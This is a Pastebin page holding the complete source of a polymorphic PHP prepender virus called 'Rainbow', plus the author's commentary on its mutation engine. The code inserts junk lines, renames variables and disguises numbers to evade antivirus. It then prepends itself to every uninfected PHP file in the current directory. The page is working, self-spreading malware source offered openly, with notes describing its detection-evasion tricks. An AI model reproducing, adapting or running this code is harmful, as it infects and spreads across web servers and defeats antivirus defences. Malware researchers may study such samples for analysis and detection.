Advertisement
FlyFar

Virus.PHP.Polymorph-Rainbow.A - Source Code - PHP Prepender Virus

Feb 19th, 2023
861
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.79 KB | Cybersecurity | 0 0
  1. <?php // RainBow
  2. srand((double)microtime()*1000000);
  3.  $changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn');
  4.  $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
  5.  $newcont='<?php // RainBow'.chr(13).chr(10);
  6. while ($string && $string!='?>'){
  7. if(rand(0,1)){
  8. if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
  9. if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
  10. if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
  11.  $string=strtok(chr(13).chr(10));
  12. if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
  13.  $counti=0;
  14. while($changevars[$counti]){
  15.  $newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
  16.  $countj=-1; $number='';
  17. while(++$countj<strlen($newcont)){
  18. if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
  19.  $number=$newcont{$countj};
  20. while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
  21.  $remn=rand(1,10);
  22. if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
  23. case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
  24. case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
  25.  $allcont.=$newcont{$countj};$number='';}
  26.  $curdir=opendir('.');
  27. while($filea=readdir($curdir)){
  28. if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
  29. if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
  30.  $viccont=fread($victim,filesize($filea));
  31. rewind($victim);
  32. fwrite($victim,$allcont.$viccont);}
  33. fclose($victim);}}
  34. closedir($curdir);
  35. function trash($returnvar, $countj){
  36. do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
  37. return $returnvar;}
  38. ?>
Advertisement
Comments
  • FlyFar
    1 year
    # text 2.00 KB | 0 0
    1. PHP.Rainbow
    2. by Second Part To Hell[rRlf]
    3. www.spth.de.vu
    4. spth@aonmail.at
    5. written in october 2003
    6. in Austria
    7.  
    8. Technique Information:
    9.  
    10. * Poly Engines
    11.  
    12. --> Adding Trash/Junk/Garbage
    13. The Virus adds ine in two lines a junk line to the code.
    14. This Junk-line could contain:
    15. - // anything
    16. - $anything='anything';
    17. - $anything=number;
    18. Because the code would be damn big after the 5th generation, I desided
    19. to delete the trash after every generation and make a new one. Anyway,
    20. the chance to get a trash-line will be bigger, because there are more
    21. lines (more lines --> more chance). But I tested about 30 generation
    22. and it's no big problem with the size.
    23.  
    24. --> Changing Variable/function names
    25. The Virus uses an array with all variable/function names of the virus,
    26. every generation it changes every array-entry (every name) to a 5-15
    27. sign long new name.
    28.  
    29. --> Number changing
    30. The virus is able to change every number in the code. This is a real
    31. sucessfull way to fake AVs, I think! A number (for instands '10') could
    32. also be one of the following things:
    33. 10=(8+2)
    34. 10=(19-9)
    35. 10=(130/13)
    36. It's easy to understand, I think. I decided to change ever 5th number I can
    37. find, because it looks better than changing every number every generation.
    38.  
    39. * Infection Method
    40.  
    41. --> Prepender
    42. This code is a prepender virus, which doesn't harm the victim file.
    43. It reads the first PHP part (which is the whole virus code) of the current
    44. file (__FILE__, as it's called in PHP). Than it searchs for every PHP-files
    45. in the current directory, and adds the changed virus code at the beginn of
    46. the victim file. Before infecting the virus checks, if there's already an
    47. infection mark or the virus, which is 'RainBow'.
    48.  
    49. Something else little interesting is, that it's hard to get many different generations from
    50. the virus, because it just changes, if it infects a file. And just the infected file has the
    51. different form, not the old virus.
    52.  
Add Comment
Please, Sign In to add comment
Advertisement